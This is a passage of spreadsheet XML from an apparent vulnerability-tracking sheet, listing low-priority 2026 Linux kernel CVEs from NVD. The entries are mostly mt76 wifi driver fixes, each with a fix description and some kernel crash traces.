          <t>New</t>
        </is>
      </c>
      <c r="C740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90372</t>
        </is>
      </c>
      <c r="D740" s="5" t="inlineStr"/>
      <c r="E740" s="5" t="inlineStr"/>
      <c r="F740" s="5" t="inlineStr"/>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="inlineStr"/>
      <c r="I740" s="5" t="inlineStr"/>
      <c r="J740" s="5" t="inlineStr"/>
      <c r="K740" s="5" t="inlineStr"/>
      <c r="L740" s="5" t="inlineStr"/>
      <c r="M740" s="5" t="inlineStr"/>
      <c r="N740" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O740" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P740" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q740" s="5" t="inlineStr"/>
      <c r="R740" s="5" t="inlineStr"/>
      <c r="S740" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: avoid nss underflow in mt7915_mcu_get_sta_nss
If a peer's VHT/HE MCS map has no supported spatial stream (all fields
0x3), the loop exits with nss == 0 and the function returned (u8)-1 (255),
which was then written into the firmware sta_rec_bf beamforming fields.
Clamp the result to 0.</t>
        </is>
      </c>
      <c r="T740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90372</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90373</t>
        </is>
      </c>
      <c r="D741" s="5" t="inlineStr"/>
      <c r="E741" s="5" t="inlineStr"/>
      <c r="F741" s="5" t="inlineStr"/>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="inlineStr"/>
      <c r="I741" s="5" t="inlineStr"/>
      <c r="J741" s="5" t="inlineStr"/>
      <c r="K741" s="5" t="inlineStr"/>
      <c r="L741" s="5" t="inlineStr"/>
      <c r="M741" s="5" t="inlineStr"/>
      <c r="N741" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O741" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P741" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q741" s="5" t="inlineStr"/>
      <c r="R741" s="5" t="inlineStr"/>
      <c r="S741" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7915: clear wcid mask under mutex after RCU pointer clear
mt7915_remove_interface() cleared the wcid mask bit with no lock held and
before clearing the RCU wcid pointer. The mask is a non-atomic RMW shared
with the allocators, which all run under dev-&gt;mt76.mutex; on DBDC the two
wiphys share one mt76_dev, so this raced add_interface/sta_add on the
other band and could leak or double-hand-out a wcid. Clearing the bit
before the RCU pointer also let a concurrent allocation reuse the index
and publish its wcid, which the subsequent NULL assignment then wiped.
Move the clear into the existing mutex section, after the RCU pointer is
cleared.</t>
        </is>
      </c>
      <c r="T741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90373</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90374</t>
        </is>
      </c>
      <c r="D742" s="5" t="inlineStr"/>
      <c r="E742" s="5" t="inlineStr"/>
      <c r="F742" s="5" t="inlineStr"/>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="inlineStr"/>
      <c r="I742" s="5" t="inlineStr"/>
      <c r="J742" s="5" t="inlineStr"/>
      <c r="K742" s="5" t="inlineStr"/>
      <c r="L742" s="5" t="inlineStr"/>
      <c r="M742" s="5" t="inlineStr"/>
      <c r="N742" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O742" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P742" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q742" s="5" t="inlineStr"/>
      <c r="R742" s="5" t="inlineStr"/>
      <c r="S742" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: validate RX band_idx before dereferencing phys[]
band_idx comes from a 2-bit descriptor field (0-3) and was used directly
to index dev-&gt;mt76.phys[] (size __MT_MAX_BAND == 3) and dereference the
result. A corrupt or reserved descriptor value could index out of bounds
or hit a NULL phy on parts with fewer bands. Reject invalid band indices,
mirroring mt7996_rx_get_wcid().</t>
        </is>
      </c>
      <c r="T742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90374</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90375</t>
        </is>
      </c>
      <c r="D743" s="5" t="inlineStr"/>
      <c r="E743" s="5" t="inlineStr"/>
      <c r="F743" s="5" t="inlineStr"/>
      <c r="G743" s="5" t="inlineStr"/>
      <c r="H743" s="5" t="inlineStr"/>
      <c r="I743" s="5" t="inlineStr"/>
      <c r="J743" s="5" t="inlineStr"/>
      <c r="K743" s="5" t="inlineStr"/>
      <c r="L743" s="5" t="inlineStr"/>
      <c r="M743" s="5" t="inlineStr"/>
      <c r="N743" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O743" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P743" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q743" s="5" t="inlineStr"/>
      <c r="R743" s="5" t="inlineStr"/>
      <c r="S743" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: fix non-AQL packet accounting for MLO stations
__mt76_tx_queue_skb() overrides the wcid passed by the driver with
sta-&gt;drv_priv, so the wcid might incorrectly be changed after TX,
causing wcid-&gt;non_aql_packets to be counted on the wrong wcid. For
example, on the AP side, if a station's setup link is the 5G link and
the station uses 2G to transmit a frame, the value of non_aql_packets
is increased on the 5G wcid but decreased on the 2G wcid. Once the
inflated counter exceeds MT_MAX_NON_AQL_PKT, the TX scheduler
permanently refuses to service the station.
Drop the reassignment and account on the wcid used for transmission.
This also records the actual wcid in the queue entry.</t>
        </is>
      </c>
      <c r="T743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90375</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90376</t>
        </is>
      </c>
      <c r="D744" s="5" t="inlineStr"/>
      <c r="E744" s="5" t="inlineStr"/>
      <c r="F744" s="5" t="inlineStr"/>
      <c r="G744" s="5" t="inlineStr"/>
      <c r="H744" s="5" t="inlineStr"/>
      <c r="I744" s="5" t="inlineStr"/>
      <c r="J744" s="5" t="inlineStr"/>
      <c r="K744" s="5" t="inlineStr"/>
      <c r="L744" s="5" t="inlineStr"/>
      <c r="M744" s="5" t="inlineStr"/>
      <c r="N744" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O744" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P744" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q744" s="5" t="inlineStr"/>
      <c r="R744" s="5" t="inlineStr"/>
      <c r="S744" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: fix MLD ID in MAC TXD and HIF TXP
Problem:
MCU command timeout while the firmware state is normal, and the
firmware keeps showing the error log "ERROR!! NO PAUSE...".
Root cause:
If the MLD_ID field in the TXD is neither the primary link id nor the
secondary link id, it may lead to a firmware busy loop when the third
link is in power saving mode.
Remap frames directed to a third link to the primary link wcid. Since
TX status events and txfree completions carry the wcid the firmware
saw, use the remapped wcid for packet id tracking and non-AQL packet
accounting as well, while the frame keeps its original link context
for addressing, band and OMAC selection.</t>
        </is>
      </c>
      <c r="T744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90376</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90377</t>
        </is>
      </c>
      <c r="D745" s="5" t="inlineStr"/>
      <c r="E745" s="5" t="inlineStr"/>
      <c r="F745" s="5" t="inlineStr"/>
      <c r="G745" s="5" t="inlineStr"/>
      <c r="H745" s="5" t="inlineStr"/>
      <c r="I745" s="5" t="inlineStr"/>
      <c r="J745" s="5" t="inlineStr"/>
      <c r="K745" s="5" t="inlineStr"/>
      <c r="L745" s="5" t="inlineStr"/>
      <c r="M745" s="5" t="inlineStr"/>
      <c r="N745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O745" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P745" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q745" s="5" t="inlineStr"/>
      <c r="R745" s="5" t="inlineStr"/>
      <c r="S745" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: fix RX data queuing of RRO 3.0
For RRO 3.0, RX data released from a RRO data queue should be put to
the indicator queue. The frames are processed and completed in the
context of the indicator queue NAPI, which only polls skbs queued on
the MT_RXQ_RRO_IND list; frames queued under the data queue id are
left sitting on that list until the data queue NAPI happens to run,
stalling and reordering RX data.</t>
        </is>
      </c>
      <c r="T745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90377</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90378</t>
        </is>
      </c>
      <c r="D746" s="5" t="inlineStr"/>
      <c r="E746" s="5" t="inlineStr"/>
      <c r="F746" s="5" t="inlineStr"/>
      <c r="G746" s="5" t="inlineStr"/>
      <c r="H746" s="5" t="inlineStr"/>
      <c r="I746" s="5" t="inlineStr"/>
      <c r="J746" s="5" t="inlineStr"/>
      <c r="K746" s="5" t="inlineStr"/>
      <c r="L746" s="5" t="inlineStr"/>
      <c r="M746" s="5" t="inlineStr"/>
      <c r="N746" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O746" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P746" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q746" s="5" t="inlineStr"/>
      <c r="R746" s="5" t="inlineStr"/>
      <c r="S746" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt792x: Fix memory leak in SDIO TX path
When tx_prepare_skb() returns an error in the SDIO TX path, the
skb is not freed, leading to a memory leak. This can occur when
zero-length frames (such as WNM NULL frames) are dropped to prevent
potential hardware TX hangs.
Fix this by properly releasing the skb with ieee80211_tx_status_ext()
when tx_prepare_skb() fails.</t>
        </is>
      </c>
      <c r="T746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90378</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90379</t>
        </is>
      </c>
      <c r="D747" s="5" t="inlineStr"/>
      <c r="E747" s="5" t="inlineStr"/>
      <c r="F747" s="5" t="inlineStr"/>
      <c r="G747" s="5" t="inlineStr"/>
      <c r="H747" s="5" t="inlineStr"/>
      <c r="I747" s="5" t="inlineStr"/>
      <c r="J747" s="5" t="inlineStr"/>
      <c r="K747" s="5" t="inlineStr"/>
      <c r="L747" s="5" t="inlineStr"/>
      <c r="M747" s="5" t="inlineStr"/>
      <c r="N747" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O747" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P747" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q747" s="5" t="inlineStr"/>
      <c r="R747" s="5" t="inlineStr"/>
      <c r="S747" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7921: Add PCIe AER handler support to prevent system crash
When an AER error occurs and the bus is hung, the register reads return
0xFFFFFFFF, causing the DMA queue state to be corrupted and resulting in
an invalid memory access when accessing q-&gt;desc[] or q-&gt;entry[].
Unable to handle kernel paging request at virtual address
ffffffc01099eac0
pc : mt76_dma_add_buf+0x124/0x188 [mt76]
lr : mt76_dma_rx_fill+0x11c/0x1d8 [mt76]
sp : ffffffc016d9bbf0
x29: ffffffc016d9bc10 x28: 0000000000000000
x27: 0000000000000000 x26: ffffffb7855e50b8
x25: ffffffb80d04f000 x24: 0000000000000000
x23: 0000000000000ec0 x22: ffffffb796803648
x21: ffffffb796801f80 x20: ffffffb7968035f8
x19: 0000000000000ec0 x18: 0000000000000000
x17: 000000004ec00000 x16: 000000000ec00000
x15: ffffffc01099eac0 x14: 000000004ec00000
x13: 00000000ffc5a000 x12: ffffffc016d9bc32
x11: 00000000ffffffff x10: 0000000000000002
x9 : 0000000000000000 x8 : 000000000000b4ac
x7 : 0000000000000a20 x6 : ffffffb6c1806400
x5 : 0000000000000000 x4 : ffffffb80d04f000
x3 : 0000000000000000 x2 : 0000000000000001
x1 : 000000000ec04000 x0 : ffffffb7968035f8
Call trace:
 mt76_dma_add_buf+0x124/0x188 [mt76 (HASH:1029 4)]
 mt76_dma_rx_reset+0xe8/0xfc [mt76 (HASH:1029 4)]
 mt7921_wpdma_reset+0x188/0x1b0 [mt7921e (HASH:ee48 5)]
 mt7921e_mac_reset+0x128/0x418 [mt7921e (HASH:ee48 5)]
 mt7921_mac_reset_work+0xac/0x1a8 [mt7921_common (HASH:f721 6)]
 process_one_work+0x188/0x514
 worker_thread+0x12c/0x300
 kthread+0x140/0x1fc
 ret_from_fork+0x10/0x30
Fix the invalid memory access by validating the DMA index read from the
hardware before it is used as a queue index. An out-of-range value, such
as the 0xFFFFFFFF returned while the bus is hung, is now clamped so it can
no longer corrupt q-&gt;head or q-&gt;tail. In addition, check the bus_hung flag
in mt7921_mac_reset_work() before attempting the reset sequence, reject MCU
messages while the bus is hung, and install no-op bus operations when an
unrecoverable AER error is detected, preventing further invalid hardware
accesses.
Due to hardware limitations - such as the lack of a connected hardware
reset pin or the absence of host re-probe functionality - affected Wi-Fi
devices may not fully recover to a normal operational state after
certain errors, even with AER enabled.</t>
        </is>
      </c>
      <c r="T747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90379</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90380</t>
        </is>
      </c>
      <c r="D748" s="5" t="inlineStr"/>
      <c r="E748" s="5" t="inlineStr"/>
      <c r="F748" s="5" t="inlineStr"/>
      <c r="G748" s="5" t="inlineStr"/>
      <c r="H748" s="5" t="inlineStr"/>
      <c r="I748" s="5" t="inlineStr"/>
      <c r="J748" s="5" t="inlineStr"/>
      <c r="K748" s="5" t="inlineStr"/>
      <c r="L748" s="5" t="inlineStr"/>
      <c r="M748" s="5" t="inlineStr"/>
      <c r="N748" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O748" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P748" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q748" s="5" t="inlineStr"/>
      <c r="R748" s="5" t="inlineStr"/>
      <c r="S748" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt792x: fix use-after-free in mt76_rx_poll_complete
A use-after-free issue occurs in mt76_rx_poll_complete due to a race
condition. The STA has already been removed, but the rx_status still
had a pointer to the wcid in the STA.
Set the links' wcid pointers to be NULL for a MLD in
mt7925_sta_pre_rcu_remove()
BUG: KASAN: invalid-access in mt76_rx_poll_complete+0x280/0x470
Call trace:
dump_backtrace+0xec/0x128
show_stack+0x18/0x28
dump_stack_lvl+0x40/0xc8
print_report+0x1b8/0x710
kasan_report+0xe0/0x144
do_bad_area+0x120/0x260
do_tag_check_fault+0x20/0x34
do_mem_abort+0x54/0xa8
el1_abort+0x3c/0x5c
el1h_64_sync_handler+0x40/0xcc
el1h_64_sync+0x7c/0x80
mt76_rx_poll_complete+0x280/0x470
mt76_dma_rx_poll+0x114/0x51c
mt792x_poll_rx+0x60/0xf8
napi_threaded_poll_loop+0xe0/0x450
napi_threaded_poll+0x80/0x9c
kthread+0x11c/0x158
ret_from_fork+0x10/0x20</t>
        </is>
      </c>
      <c r="T748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90380</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90381</t>
        </is>
      </c>
      <c r="D749" s="5" t="inlineStr"/>
      <c r="E749" s="5" t="inlineStr"/>
      <c r="F749" s="5" t="inlineStr"/>
      <c r="G749" s="5" t="inlineStr"/>
      <c r="H749" s="5" t="inlineStr"/>
      <c r="I749" s="5" t="inlineStr"/>
      <c r="J749" s="5" t="inlineStr"/>
      <c r="K749" s="5" t="inlineStr"/>
      <c r="L749" s="5" t="inlineStr"/>
      <c r="M749" s="5" t="inlineStr"/>
      <c r="N749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O749" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P749" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q749" s="5" t="inlineStr"/>
      <c r="R749" s="5" t="inlineStr"/>
      <c r="S749" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: fix handling channel context with different bands in mt76_switch_vif_chanctx()
When performing channel switches on different radios within a short
timeframe, channel contexts with different bands can be carried for
each struct ieee80211_vif_chanctx_switch.
Rework mt76_switch_vif_chanctx() to properly handle this scenario.</t>
        </is>
      </c>
      <c r="T749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90381</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90382</t>
        </is>
      </c>
      <c r="D750" s="5" t="inlineStr"/>
      <c r="E750" s="5" t="inlineStr"/>
      <c r="F750" s="5" t="inlineStr"/>
      <c r="G750" s="5" t="inlineStr"/>
      <c r="H750" s="5" t="inlineStr"/>
      <c r="I750" s="5" t="inlineStr"/>
      <c r="J750" s="5" t="inlineStr"/>
      <c r="K750" s="5" t="inlineStr"/>
      <c r="L750" s="5" t="inlineStr"/>
      <c r="M750" s="5" t="inlineStr"/>
      <c r="N750" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O750" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P750" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q750" s="5" t="inlineStr"/>
      <c r="R750" s="5" t="inlineStr"/>
      <c r="S750" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt76x02: do not WARN on invalid rx descriptor length
The MPDU length in the rx descriptor comes from the hardware. In
monitor mode with the fcsfail filter enabled, the hardware passes up
corrupted frames, and a corrupted frame can report a length larger
than the received buffer. The bounds check correctly discards such
frames, but its WARN_ON_ONCE wrapper means any over-the-air garbage
frame taints the kernel, and panics it on the first such frame when
panic_on_warn is set.
Drop the WARN and discard the frame silently, matching what
commit c2d4c8723dbf ("mt76x2: remove some harmless WARN_ONs in tx
status and rx path") did for the neighboring rx and tx status paths.
Observed immediately on rx with an MT7612U in fcsfail monitor mode
on a busy channel.</t>
        </is>
      </c>
      <c r="T750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90382</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90383</t>
        </is>
      </c>
      <c r="D751" s="5" t="inlineStr"/>
      <c r="E751" s="5" t="inlineStr"/>
      <c r="F751" s="5" t="inlineStr"/>
      <c r="G751" s="5" t="inlineStr"/>
      <c r="H751" s="5" t="inlineStr"/>
      <c r="I751" s="5" t="inlineStr"/>
      <c r="J751" s="5" t="inlineStr"/>
      <c r="K751" s="5" t="inlineStr"/>
      <c r="L751" s="5" t="inlineStr"/>
      <c r="M751" s="5" t="inlineStr"/>
      <c r="N751" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O751" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P751" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q751" s="5" t="inlineStr"/>
      <c r="R751" s="5" t="inlineStr"/>
      <c r="S751" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
misc: sgi-gru: remove interrupt-context page-table walks
The GRU TLB miss handler walks a process's page tables without holding
page-table locks or a reference to the mapped page. It also uses a kernel
page-table accessor on user page tables and supports only PMD-level large
mappings on x86-64.
Remove the direct walker. Send interrupt faults directly to user polling
mode so the existing call-OS fallback retries them in process context.
Remove the mmap-lock failure statistic that can no longer be incremented.</t>
        </is>
      </c>
      <c r="T751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90383</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90384</t>
        </is>
      </c>
      <c r="D752" s="5" t="inlineStr"/>
      <c r="E752" s="5" t="inlineStr"/>
      <c r="F752" s="5" t="inlineStr"/>
      <c r="G752" s="5" t="inlineStr"/>
      <c r="H752" s="5" t="inlineStr"/>
      <c r="I752" s="5" t="inlineStr"/>
      <c r="J752" s="5" t="inlineStr"/>
      <c r="K752" s="5" t="inlineStr"/>
      <c r="L752" s="5" t="inlineStr"/>
      <c r="M752" s="5" t="inlineStr"/>
      <c r="N752" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O752" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P752" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q752" s="5" t="inlineStr"/>
      <c r="R752" s="5" t="inlineStr"/>
      <c r="S752" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iomap: release the folio batch on iomap callback failures
A sashiko review of an unrelated patch points out that the folio
batch mechanism used for iomap zero range fails to release the batch
in a couple error scenarios. If either calls to -&gt;iomap_end() or
-&gt;iomap_begin() fail, the direct return paths bypass the batch
cleanup.
The -&gt;iomap_end() case is not a practical issue at the moment
because there is no user of the mechanism that returns an error from
this path. The -&gt;iomap_begin() case is theoretically possible
because XFS can invoke the fill helper and error out at various
points thereafter. This subtly complicates things because XFS does
not transfer iomap_flags to the iomap data structure in the error
path.
To deal with both of these issues, first make sure to invoke the
cleanup helper in the error path for either fs callback. Second,
update the helper to clear the flag unconditionally and release the
batch so long as it is populated. This more clearly delineates the
purpose of the flag to control the I/O path and not necessarily the
status of the fbatch, so add a comment around this as well.</t>
        </is>
      </c>
      <c r="T752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90384</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90385</t>
        </is>
      </c>
      <c r="D753" s="5" t="inlineStr"/>
      <c r="E753" s="5" t="inlineStr"/>
      <c r="F753" s="5" t="inlineStr"/>
      <c r="G753" s="5" t="inlineStr"/>
      <c r="H753" s="5" t="inlineStr"/>
      <c r="I753" s="5" t="inlineStr"/>
      <c r="J753" s="5" t="inlineStr"/>
      <c r="K753" s="5" t="inlineStr"/>
      <c r="L753" s="5" t="inlineStr"/>
      <c r="M753" s="5" t="inlineStr"/>
      <c r="N753" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O753" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P753" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q753" s="5" t="inlineStr"/>
      <c r="R753" s="5" t="inlineStr"/>
      <c r="S753" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md/raid1: create serial pool adding rdev to array with serialize_policy=1
The following bug has been observed with kernel 7.1.3 after adding a new
rdev to an existing RAID1 array with serialize_policy enabled:
  Oops: 0002 [#1]
  CPU: 0 UID: 0 PID: 19639 Comm: ext4lazyinit Not tainted 7.1.3-1-default
  RIP: _raw_spin_lock_irqsave+0x27/0x50
  CR2: 0000000000004960
  Call Trace:
   wait_for_serialization+0xb9/0x260 [raid1]
   raid1_make_request+0x762/0xaff [raid1]
   md_handle_request+0x1c9/0x2e0 [md_mod]
The raid1.c code calls wait_for_serialization() if the MD_SERIALIZE_POLICY
is set, and wait_for_serialization assumes that rdev-&gt;serial is
initialized. Normally this will be the case for arrays that have
the serialize_policy sysfs attribute set to 1.
But when a new rdev is added to an existing array in bind_rdev_to_array(),
the condition at mddev_create_serial_pool() causes creation of rdev-&gt;serial
to be skipped. Fix it.</t>
        </is>
      </c>
      <c r="T753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90385</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90386</t>
        </is>
      </c>
      <c r="D754" s="5" t="inlineStr"/>
      <c r="E754" s="5" t="inlineStr"/>
      <c r="F754" s="5" t="inlineStr"/>
      <c r="G754" s="5" t="inlineStr"/>
      <c r="H754" s="5" t="inlineStr"/>
      <c r="I754" s="5" t="inlineStr"/>
      <c r="J754" s="5" t="inlineStr"/>
      <c r="K754" s="5" t="inlineStr"/>
      <c r="L754" s="5" t="inlineStr"/>
